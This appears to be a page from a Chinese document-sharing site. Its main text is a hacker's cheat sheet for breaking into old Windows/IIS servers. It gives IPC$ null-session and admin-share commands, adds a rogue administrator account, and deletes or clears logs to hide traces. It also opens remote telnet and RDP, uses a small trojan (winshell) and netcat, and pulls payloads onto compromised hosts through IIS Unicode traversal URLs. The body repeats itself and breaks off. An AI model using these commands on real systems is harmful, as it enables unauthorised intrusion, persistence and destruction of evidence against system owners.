與遠(yuǎn)程主機(jī)建立空管連接_第1頁
與遠(yuǎn)程主機(jī)建立空管連接_第2頁
與遠(yuǎn)程主機(jī)建立空管連接_第3頁
與遠(yuǎn)程主機(jī)建立空管連接_第4頁
與遠(yuǎn)程主機(jī)建立空管連接_第5頁
已閱讀5頁,還剩4頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

(與遠(yuǎn)程主機(jī)建立空管連接)netuse\\IP地址\ipc$""/use:""

(以管理員身份登錄遠(yuǎn)程主機(jī))netuse\\IP地址\ipc$"密碼"/use:"Administrator"

(傳送文件到遠(yuǎn)程主機(jī)WINNT目錄下)copy本機(jī)目錄路徑\程序\\IP地址\admin$

(查看遠(yuǎn)程主機(jī)時間)nettime\\IP地址

(定時啟動某個程序)at\\IP地址02:18readme.exe

(查看共享)netview\\IP地址

(查看netbios工作組列表)nbtstat-AIP地址

(將遠(yuǎn)程主機(jī)C盤映射為自己的F盤)netusef:\\IP地址\c$""/user:"Administrator"

(這兩條把自己增加到管理員組):netuser用戶名密碼/add

netlocalgroupAdministrators用戶名/add

(斷開連接)netuse\\IP地址\ipc$/delete

=====================================================

擦屁屁:

delC:\winnt\system32\logfiles\*.*

delC:\winnt\system32\config\*.evt

delC:\winnt\system32\dtclog\*.*

delC:\winnt\system32\*.log

delC:\winnt\system32\*.txt

delC:\winnt\*.txt

delC:\winnt\*.log

============================

一、netsvc.exe

下面的命令分別是列出主機(jī)上的服務(wù)項目、查尋和遠(yuǎn)程啟動主機(jī)的“時間任務(wù)”服務(wù):

netsvc/list\\IP地址

netsvcschedule\\IP地址/query

netsvc\\IP地址schedule/start

二、OpenTelnet.exe

遠(yuǎn)程啟動主機(jī)的Telnet服務(wù),并綁定端口到7878,例如:

OpenTelnet\\IP地址用戶名密碼17878

然后就可以telnet到主機(jī)的7878端口,進(jìn)入DOS方式下:

telnetIP地址7878

三、winshell.exe

一個非常小的木馬(不到6K),telnet到主機(jī)的7878端口,輸入密碼winshell,當(dāng)看到CMD>后,可打下面的命令:

pPath(查看winshell主程序的路徑信息)

breBoot(重新啟動機(jī)器)

dshutDown(關(guān)閉機(jī)器)

sShell(執(zhí)行后你就會看到可愛的“C:\>”)

xeXit(退出本次登錄會話,此命令并不終止winshell的運(yùn)行)

CMD>

http://.../srv.exe

(通過http下載其他網(wǎng)站上的文件到運(yùn)行winshell的機(jī)器上)

四、3389登陸器,GUI方式登錄遠(yuǎn)程主機(jī)的

五、elsave.exe

事件日志清除工具

elsave-s\\IP地址-l"application"-C

elsave-s\\IP地址-l"system"-C

elsave-s\\IP地址-l"security"-C

執(zhí)行后成功清除應(yīng)用程序日志,系統(tǒng)日志,安全日志

六、hbulot.exe

開啟win2kserver和winxp的3389服務(wù)

hbulot[/r]

使用/r表示安裝完成后自動重起目標(biāo)使設(shè)置生效。

七、nc.exe(netcat.exe)

一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。

想要連接到某處:nc[-options]hostnameport[s][ports]...

綁定端口等待連接:nc-l-pport[-options][hostname][port]

參數(shù):

-eprog程序重定向,一旦連接,就執(zhí)行[危險!!]

-ggatewaysource-routinghoppoint[s],upto8

-Gnumsource-routingpointer:4,8,12,...

-h幫助信息

-isecs延時的間隔

-l監(jiān)聽模式,用于入站連接

-n指定數(shù)字的IP地址,不能用hostname

-ofile記錄16進(jìn)制的傳輸

-pport本地端口號

-r任意指定本地及遠(yuǎn)程端口

-saddr本地源地址

-uUDP模式

-v詳細(xì)輸出——用兩個-v可得到更詳細(xì)的內(nèi)容

-wsecstimeout的時間

-z將輸入輸出關(guān)掉——用于掃描時

八、TFTPD32.EXE

把自己的電腦臨時變?yōu)橐慌_FTP服務(wù)器,讓肉雞來下載文件,tftp命令要在肉雞上執(zhí)行,通常要利用Unicode漏洞或telnet到肉雞,例如:

http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/ctftp-i本機(jī)IP地址get文件名c:\winnt\system32\文件名

然后可以直接令文件運(yùn)行:

http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是IIS的printer遠(yuǎn)程緩沖區(qū)溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個端口監(jiān)聽”,然后用telnet連接它的監(jiān)聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執(zhí)行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。

一、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執(zhí)行權(quán)限的目錄。然后用IE瀏覽器連接。

一、Xscan命令行運(yùn)行參數(shù)說明:

在檢測過程中,按"[空格]"鍵可以查看各線程狀態(tài)及掃描進(jìn)度,按"q"鍵保存當(dāng)前數(shù)據(jù)后提前退出程序,按""強(qiáng)行關(guān)閉程序。

1.命令格式:xscan-host[-][其他選項]

xscan-file

[其他選項]

其中含義如下:

-port:檢測常用服務(wù)的端口狀態(tài)(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定制待檢測端口列表);

-ftp:檢測FTP弱口令(可通過\dat\config.ini文件設(shè)置用戶名/密碼字典文件);

-ntpass:檢測NT-Server弱口令(可通過\dat\config.ini文件設(shè)置用戶名/密碼字典文件);

-cgi:檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設(shè)置編碼方案);

-iis:檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設(shè)置編碼方案);

[其他選項]含義如下:

-v:顯示詳細(xì)掃描進(jìn)度

-p:跳過Ping不通的主機(jī)

-o:跳過沒有檢測到開放端口的主機(jī)

-t:指定最大并發(fā)線程數(shù)量和并發(fā)主機(jī)數(shù)量,默認(rèn)數(shù)量為100,10

(與遠(yuǎn)程主機(jī)建立空管連接)netuse\\IP地址\ipc$""/use:""

(以管理員身份登錄遠(yuǎn)程主機(jī))netuse\\IP地址\ipc$"密碼"/use:"Administrator"

(傳送文件到遠(yuǎn)程主機(jī)WINNT目錄下)copy本機(jī)目錄路徑\程序\\IP地址\admin$

(查看遠(yuǎn)程主機(jī)時間)nettime\\IP地址

(定時啟動某個程序)at\\IP地址02:18readme.exe

(查看共享)netview\\IP地址

(查看netbios工作組列表)nbtstat-AIP地址

(將遠(yuǎn)程主機(jī)C盤映射為自己的F盤)netusef:\\IP地址\c$""/user:"Administrator"

(這兩條把自己增加到管理員組):netuser用戶名密碼/add

netlocalgroupAdministrators用戶名/add

(斷開連接)netuse\\IP地址\ipc$/delete

=====================================================

擦屁屁:

delC:\winnt\system32\logfiles\*.*

delC:\winnt\system32\config\*.evt

delC:\winnt\system32\dtclog\*.*

delC:\winnt\system32\*.log

delC:\winnt\system32\*.txt

delC:\winnt\*.txt

delC:\winnt\*.log

============================

一、netsvc.exe

下面的命令分別是列出主機(jī)上的服務(wù)項目、查尋和遠(yuǎn)程啟動主機(jī)的“時間任務(wù)”服務(wù):

netsvc/list\\IP地址

netsvcschedule\\IP地址/query

netsvc\\IP地址schedule/start

二、OpenTelnet.exe

遠(yuǎn)程啟動主機(jī)的Telnet服務(wù),并綁定端口到7878,例如:

OpenTelnet\\IP地址用戶名密碼17878

然后就可以telnet到主機(jī)的7878端口,進(jìn)入DOS方式下:

telnetIP地址7878

三、winshell.exe

一個非常小的木馬(不到6K),telnet到主機(jī)的7878端口,輸入密碼winshell,當(dāng)看到CMD>后,可打下面的命令:

pPath(查看winshell主程序的路徑信息)

breBoot(重新啟動機(jī)器)

dshutDown(關(guān)閉機(jī)器)

sShell(執(zhí)行后你就會看到可愛的“C:\>”)

xeXit(退出本次登錄會話,此命令并不終止winshell的運(yùn)行)

CMD>

http://.../srv.exe

(通過http下載其他網(wǎng)站上的文件到運(yùn)行winshell的機(jī)器上)

四、3389登陸器,GUI方式登錄遠(yuǎn)程主機(jī)的

五、elsave.exe

事件日志清除工具

elsave-s\\IP地址-l"application"-C

elsave-s\\IP地址-l"system"-C

elsave-s\\IP地址-l"security"-C

執(zhí)行后成功清除應(yīng)用程序日志,系統(tǒng)日志,安全日志

六、hbulot.exe

開啟win2kserver和winxp的3389服務(wù)

hbulot[/r]

使用/r表示安裝完成后自動重起目標(biāo)使設(shè)置生效。

七、nc.exe(netcat.exe)

一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。

想要連接到某處:nc[-options]hostnameport[s][ports]...

綁定端口等待連接:nc-l-pport[-options][hostname][port]

參數(shù):

-eprog程序重定向,一旦連接,就執(zhí)行[危險!!]

-ggatewaysource-routinghoppoint[s],upto8

-Gnumsource-routingpointer:4,8,12,...

-h幫助信息

-isecs延時的間隔

-l監(jiān)聽模式,用于入站連接

-n指定數(shù)字的IP地址,不能用hostname

-ofile記錄16進(jìn)制的傳輸

-pport本地端口號

-r任意指定本地及遠(yuǎn)程端口

-saddr本地源地址

-uUDP模式

-v詳細(xì)輸出——用兩個-v可得到更詳細(xì)的內(nèi)容

-wsecstimeout的時間

-z將輸入輸出關(guān)掉——用于掃描時

八、TFTPD32.EXE

把自己的電腦臨時變?yōu)橐慌_FTP服務(wù)器,讓肉雞來下載文件,tftp命令要在肉雞上執(zhí)行,通常要利用Unicode漏洞或telnet到肉雞,例如:

http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/ctftp-i本機(jī)IP地址get文件名c:\winnt\system32\文件名

然后可以直接令文件運(yùn)行:

http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是IIS的printer遠(yuǎn)程緩沖區(qū)溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個端口監(jiān)聽”,然后用telnet連接它的監(jiān)聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執(zhí)行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。

一○、ntis.exe、

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論